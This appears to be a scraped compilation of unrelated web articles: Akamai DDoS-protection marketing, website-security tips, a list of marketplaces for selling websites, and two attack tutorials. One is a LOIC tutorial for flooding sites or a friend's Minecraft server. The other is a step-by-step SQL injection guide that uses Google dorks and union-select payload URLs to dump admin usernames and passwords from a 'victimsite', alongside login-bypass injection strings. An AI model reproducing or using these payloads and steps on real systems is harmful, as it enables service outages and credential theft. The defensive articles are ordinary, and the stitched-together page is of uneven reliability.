HOW TO PROTECT AGAINST DDOS ATTACKS - STOP DENIAL OF SERVICE

DDoS Attacks: Situation Overview

Over the last decade, Distributed Denial of Service (DDoS) attacks have continued to proliferate, becoming one of the primary threat types facing virtually every industry and business area that is exposed to the public Internet.Therefore, DDoS protection must be at the core of a successful security strategy.

DDoS attacks attempt to bring down and infiltrate Web sites by flooding the site's origin server with bogus requests, often from multiple locations and networks. If allowed to proceed unchecked, this DDoS attack traffic can produce results ranging from slow page loads to a complete blockage of legitimate site traffic.

These types of attacks can originate from a variety of sources, including 'hacktivists,' for-profit hackers, state-sponsored hacking groups, and others. In many cases, DDoS attacks leverage the force multiplication advantage of 'botnets,' essentially armies of computers that are penetrated and recruited to generate attack traffic unbeknownst to their own user or administrator.

DDoS Mitigation

Given the growing number and scale of DDoS attacks, planning for DDoS attack detection and mitigation is a critical IT function. Since it's virtually impossible to build out sufficient infrastructure to scale in response to a large DDoS attack, solutions like Akamai's Kona Site Defender are increasingly being deployed by owners of Web properties across virtually every industry. Cloud-based solutions like Kona Site Defender offer built-in scalability and global reach to defend against most common types of DDoS attacks, as well as attacks against web applications (SQL Injections, Cross Site Scripts, etc.) and direct-to-origin attacks.

How Kona Site Defender Blocks DDoS Attacks

Kona Site Defender mitigates DDoS attacks by absorbing DDoS traffic targeted at the application layer, deflecting all DDoS traffic targeted at the network layer such as SYN Floods or UDP Floods, and authenticating valid traffic at the network edge. This built-in protection is "always on", and only Port 80 (HTTP) or Port 443 (HTTPS) traffic is allowed. Bursting fees can be capped so users are protected from DDoS traffic running up service fees, and flexible caching maximizes offload from origin.

For added protection, many organizations add a defense layer that protects the Domain Name Server from being overloaded and compromised by Denial of Service attacks, such as Akamai's Fast DNS solution. Both of these solutions leverage the power of the Akamai Intelligent Platform™, which consists of more than 160,000 servers deployed across over 1,200 networks in more than 95 countries.

Akamai's Global Scale Helps Combat DDoS Attack Traffic

The worldwide distribution and massive scale of the Akamai Intelligent Platform™ enables Web sites to stay available without re-routing traffic or impacting performance. Akamai handles 5.5Tbps of traffic daily on average and has handled peak traffic flows of over 8Tbps. And DDoS mitigation capabilities are implemented natively in path so protection is provided only one network hop from the point of request—NOT at the customer origin.

Source : https://www.akamai.com/us/en/resources/protect-against-ddos-attacks.jsp

How to DDos a Website Like a Pro (Windows Only)

Welcome to this short and easy tutorial on hacking and DDosing (is that even a word I don't know) anyways lets get started

First of all DDos means distributed denail of service attack, and yes i don't know what the HELL it means either. but anyway DDosing is where you spam a website or server with so much data that it forces them to close down for a short amount of time. Be warned though, if you have a bandwith cap then this will waste it within a minute, so only do this if you're using an ISP with unlimited bandwith. P.S you will need quite a lot of computers to shut websites down but you can at least lag them a lot. It's good for winding you friend up if he has a minecraft server or something though.

Step 1: Getting the Software

To DDos, first your going to have to get the software. The software we are going to be using in this tutorial is called Low Orbit Ion Cannon (abreviated LOIC) you can get this from http://sourceforge.net/projects/loic/ Once you download the file, go ahead and extract it to your desktop.

Step 2: Targeting the Website

Now open LOIC (obvious but I want to get some of them little credit thingys so i'm trying to make it however many words long) and you will be prompted with a screen a little bit like this

First of all find the box that says 1. Select your target and fill it in. If you want to DDos a website, put the web adress in the url box, if you have an ip you want to DDos then put the ip in the box.Then press the lock on button next to the text box you filled in.

Step 3: Configuring the Attack

Skip the big button that says ima chargin mah lazer and go to section 3 that says attack options. keep timeout ,http subsite and the speed bar the same but in tcp/udp message enter a random message, in port type whatever port you want to attack, and in method select UDP. (if your attacking a website keep the port the same, and for minecraft servers it is usually 25565) also, uncheck wait for reply and keep threads at 10. If you have a good pc you can change it to 20 but no more than 20. in the end, your screen should look like this:

Step 4: Fire the Lazer!!!!!!!!!!!!!!!!!!!

Now all thats left to do is press the big button that says IMMA CHARGIN MAH LAZER. once you have pressed that, you should see the requested collumn in attack status be filling up with loads of numbers and stuff. This is how many times it has requested that page or minecraft server or whatever from the server.

Hope you enjoyed this tutorial, and be sure to give that kudos stuff, even if it does get rid of them little credit thingys.

Source : http://null-byte.wonderhowto.com/how-to/ddos-website-like-pro-windows-only-0148872/

How Secure Website

CSRF - You need to have protection in place to prevent cross site request forgery - or requests to login, signup, or other actions from other sites. This can be used to trick users into performing actions they didn't intend to.

CAPTCHA on signup - It's often recommended to use a CAPTCHA on your sigh-up form to reduce automated signups. How important this is depends on your threat model.

Secure login - The login needs to happen over HTTPS to reduce the risk of the user's credentials being captured via a MiTM attack.

Cookies - While login over HTTPS should be seen as a minimum, everything else really should be over SSL as well to protect the cookies (remember Firesheep?). Though just using SSL isn't enough, you need to set the Secure flag and HttpOnly flag whenever possible.

Email Confirmation - You need to make sure that you verify a user's email address as part of the sign-up process (I'd suggest not letting them login until it's confirmed). You'll need to have this for use in password resets.

Bruteforce protection - You need to protect against an attacker bruteforcing user accounts. There are various ways to do this, locking accounts (which can be used as a DoS attack by locking out large number of users), limiting failed attempts from a given IP (either via ban, or additional CAPTCHA). There are pros and cons to each method, but it's important that you have some form of protection in place.

Secure password reset - You need to make sure that you have a secure method for resetting passwords. This one is more complicated than most people think, and is easy to get wrong (as Apple recently found). The biggest risk is that an attacker finds a way to abuse the feature to reset accounts that they don't own.

I'd strongly suggest that you read the OWSAP Authentication Cheat Sheet, it goes into detail on these and many other potential issues; and as always, when building new systems, it's a good time to take another look at the OWASP Top 10 and make sure you have taken the proper precautions.

Hacking website using SQL Injection -step by step guide

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.

Some List of Database are:

* DB servers,
* MySQL(Open source), 
* MSSQL, 
* MS-ACCESS, 
* Oracle, 
* Postgre SQL(open source), 
* SQLite,

SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name “SQL” is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation
“S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,…) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values(“BreakTheSec”,”break”);

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let’s dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use “inurl:” command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A…t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.

Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=

 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(‘) at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table. 
For that replace the single quotes(‘) with “order by n” statement.(leave one space between number and order by nstatement)

Change the n from 1,2,3,4,,5,6,…n. Until you get the error like “unknown column “.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

 change the number until you get the error as “unknown column”

if you get the error while trying the “x”th number,then no of column is “x-1″.

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
 

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the “–” at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using “union select columns_sequence” we can find the vulnerable part of the table. Replace the “order by n” with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than ‘x’ value, i mean less than or equl to number of columns).

Like this:

Now select 1 number.
It showing 3,7. Let’s take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with “version()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

 Now it will show the list of table names. Find the table name which is related with the admin or user.

Now select the “admin ” table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the “group_concat(table_name) with the “group_concat(column_name)”

Replace the “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Copy and paste the code at the end of the url instead of the “mysqlchar”
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”

For eg:

http://www.victimsite.com/index.php?id=-2 
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password. 
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

etc.

Souce : http://breakthesecurity.cysecurity.org/2010/12/hacking-website-using-sql-injection-step-by-step-guide.html

How to exploit the SQL Injection Attack

Exploiting an SQL Inject attack involves solving a puzzle that is a cross between Hangman and 20 Questions. It needs a little understanding of SQL and a great deal of cunning.

Try your Hacking skills against this test system. It takes you through the exploit step-by-step.

The SQL Injection attack allows external users to read details from the database. In a well designed system this will only include data that is available to the public anyway. In a poorly designed system this may allow external users to discover other users' passwords.
Try these steps:

To gain access and find a user name. Enter the string as both user name and password in the frame on the right. This should get you logged in as a user (jake happens to be the first user in the table). This tells you that Jake is a user and it allows you to access his account - but it does not tell you his password. 

Find out if Jake's password includes the letter "w". Enter xxx as user name and enter the following string as the password:
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='


Find out if Jake's password has "w" as the third letter. Enter xxx as user name and enter the following string as the password:


' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='

12 Tips to Protect Your Company Website From Hackers

Making your website live is like unlocking the door to your premises with your office and safe open: Most of the people who visit your physical building will never even know that all of your data is there to discover just by walking in. Occasionally you will find someone with malicious intent who will walk in and steal your data. That is why you have locks on doors and safes.

Your website is just the same, except that you will never see anyone come in unless you have protection systems in place. Electronic thieves are invisible and fast., searching for your website for details of customers’ accounts, especially for their credit card information. You have a legal obligation to protect this data from theft and to report security breaches that occur.

Related: A Seven-Step Guide to Protecting Customer Privacy

Theft is not the only thing on the mind of a hacker: Sheer destruction is a major motivator. Hackers may want to destroy all your records, put a sick message on your customers’ screens or just destroy your reputation.

You can never undo the damage done by a hacker, you can take steps to prevent it. Even the most basic protection will discourage many hackers enough to make them go looking for easier pickings elsewhere. Thieves are likelier to steal from people who leave their doors unlocked.

1. Stay updated.

You need to stay up to date with hacking threats. If you have at least a basic knowledge of what is possible then you can protect your website against it. Follow updates at a tech site such as The Hacker News. Use the information you gain to put fresh precautions in place when necessary.

2. Toughen up access control.

The admin level of your website is an easy way into everything you do not want a hacker to see. Enforce user names and passwords that can not be guessed. Change the default database prefix from “wp6_” to something random and harder to guess. Limit the number of login attempts within a certain time, even with password resets, because email accounts can be hacked as well. Never send login details by email, in case an unauthorized user has gained access to the account.

3. Update everything.

Updates cost software companies money. They only do it when necessary, yet many people who use the software do not install updates immediately. If the reason behind the update is a security vulnerability, delaying an update exposes you to attack in the interim period. Hackers can scan thousands of websites an hour looking for vulnerabilities that will allow them to break in. They network like crazy, so if one hacker knows how to get into a program then hundreds of hackers will know as well.

Related: 5 No-Brainer Tips to Avoid Getting Hacked

4. Tighten network security.

Computer users in your office may be inadvertently providing an easy access route to your website servers. Ensure that:

• Logins expire after a short period of inactivity.
• Passwords are changed frequently.
• Passwords are strong and NEVER written down.
• All devices plugged into the network are scanned for malware each time they are attached.

Ever since I founded my hosting company, we've had to watch our network security on a minute-by-minute basis not to be hacked. 

5. Install a web application firewall.

A web application firewall (WAF) can be software or hardware based. It sets between your website server and the data connection and reads every bit of data passing through it.

Most of the modern WAFs are cloud based and provided as a plug-and-play service, for a modest monthly subscription fee. Basically, the cloud service is deployed in front of your server, where it serves as a gateway for all incoming traffic. Once installed, web application firewall provides complete peace of mind, by blocking all hacking attempts and also filtering out other types of unwanted traffic, like spammers and malicious bots. This is a great way to avoid getting hacked like Craigslist.

6. Install security applications.

While not as effective as a full blown WAF, there are some free and paid for security applications that you can install that will make life a bit more difficult for hackers. In fact, even some free plugins such as that fromAcunetix WP Security can provide an additional level of protection by hiding the identity of your website’s CMS. By doing so this tool makes you more resilient against automated hacking tools that scout the web, looking for WordPress sites with specific build and version, which has one or more known vulnerabilities.

7. Hide admin pages.

You do not want your admin pages to be indexed by search engines, so you should use the robots_txt file to discourage search engines from listing them. If they are not indexed then they are harder for hackers to find. This tutorial from SEObook.com is all the help you will need.

8. Limit file uploads.

File uploads are a major concern. No matter how thoroughly the system checks them out, bugs can still get through and allow a hacker unlimited access to your site’s data. The best solution is to prevent direct access to any uploaded files. Store them outside the root directory and use a script to access them when necessary. Your web host will probably help you to set this up.

9. Use SSL.

Use an encrypted SSL protocol to transfer users’ personal information between the website and your database. This will prevent the information being read in transit and accesses without the proper authority.

10. Remove form auto-fill.

When you leave auto-fill enabled for forms on your website, you leave it vulnerable to attack from any user’s computer or phone that has been stolen. You should never expose your website to attacks that utilize the laziness of a legitimate user.

11. Back-up frequently.

Just in case the worst happens anyway, keep everything backed-up. Back up on-site, back up off-site, back up everything multiple times a day. Every time a user saves a file it should automatically back up in multiple locations. Backing up once a day means that you lose that day’s data when your hard drive fails. Remember every hard drive will fail.

12. You can't hide your code.

You can buy software that says it will hide the code on your webpages. It doesn’t work. Browsers need access to your code in order to render your website pages, so there are simple ways to get around web-page “encryption.”

Disabling “right-click” as a way to view your website code is annoying to users because it also disables every other “right-click” function, and there are simple workarounds that every hacker knows anyway. If you have been told that it is possible then read this article on HTMLgoodies.com to get in-depth explanations of why you can never hide your code.

Your Experience: Has your website been hacked? How did the criminals get in? Please use the comments facility below to share your story including the changes you made after the attack

Source : http://www.entrepreneur.com/article/241620

10 Places to Sell Your Web Site

There comes a time when we all have an idea for a web site, we set it up and then…we never have time to work on it. There also comes a time when you realize you don’t have the passion you once did, and instead of just letting it die, you want to find a new caretaker for your once beloved web site. So, what do you do when one of these situations happens?

Well, it’s time for you to look into selling it off — but then comes the question of where to do that. We’ve collected ten of the best options for you.

Flippa.com: has the most websites for sale, over 3,000 at time of writing and also has the largest number of buyers, over 600,000 are registered to buy websites and domain names on Flippa. Over $130 million in web sites have sold on Flippa since launch in 2009. Flippa comes with a simple interface, a super powerful search feature, the option to upgrade your auction , they charge a small listing fee $9-$19, with a 10% success fee. What makes Flippa stand out from the pack is their trust and verification features, like phone number verification and verified Google Analytics traffic stats, which helps boost average selling prices. Flippa also attracts serious buyers who are prepared to pay good money for high quality sites through Deal Flow, website broker service.

BuySellWebsite.com: BuySellWebsite specializes in established and start-up web sites. Established web sites cost $59 for a 2-week listing, or $99 for a two-month long listing (with a free one-month extension, for a total of three months) that includes being featured on the front page. Start-up sites cost the same, but don’t include the front page featuring.

Forums.DigitalPoint.com: A forum for all types of web development that allows you to post a site for sale as long as you have been a member for at least 14 days, do not have a reputation in the red and have a minimum of 25 posts throughout their boards.

GeekVillage.com Forums: To list your site with the GeekVillage.com forums, it will cost you $9.95 per topic, and you must be a member in good standing with the forum.

InternetCompanyForSale.com: This site charges no commissions on the sales through their company, but they do have one time listing fees depending on the type of site you want to sell. Established sites pay $59.95 for list-til-you-sell. Start-up sites will cost you $39.95, and a Permanently Featured Listing, either for a established site or start-up, it will cost you $99 and will get you featured in their bi-weekly newsletter.

SiteIndeed.com: SiteIndeed provides basic listing ads for free for up to 90 days, but if you want to extend your listing past that they will charge you a fee based upon the number of days you choose. The site also provides featured listings that will give your site more prominent display for a fee, based on the number of days you wish to list it.

Talk.iWebTool.com: A forum dedicated to everything about developing your own web sites and domain names. It also has an active sales area for selling domain names, sites, scripts and more.

Webmaster-Talk.com Marketplace: A general sales site that allows you to do everything from promoting your services to selling your established sites. General listing fees are free, but services such as promotions will cost you credits you purchase with the site. With auctions, you can select to feature it on the main page, highlight it, etc., and those services will cost you a few dollars each.

WebsiteAcquire.com: WebsiteAcquire only charges $5 for listing your site, but it isn’t very browsing friendly. When a user clicks on the link to buy a site, they ask you to search on keywords instead of just letting you browse the currently available listings.

WebsiteBroker.com: WebsiteBroker allows you to sell both domain names and complete web sites. Web sites can be listed for 90-days for $9.95, or $29.95 for a premium listing that gains you extra exposure. Domain names have similar auctions priced at $9.95 for standard listing and $14.95 for premium. There is no commissions charged on completed listings.

Which site is your favorite for selling your excess web sites?

Source :  http://www.sitepoint.com/10-places-to-sell-your-web-site/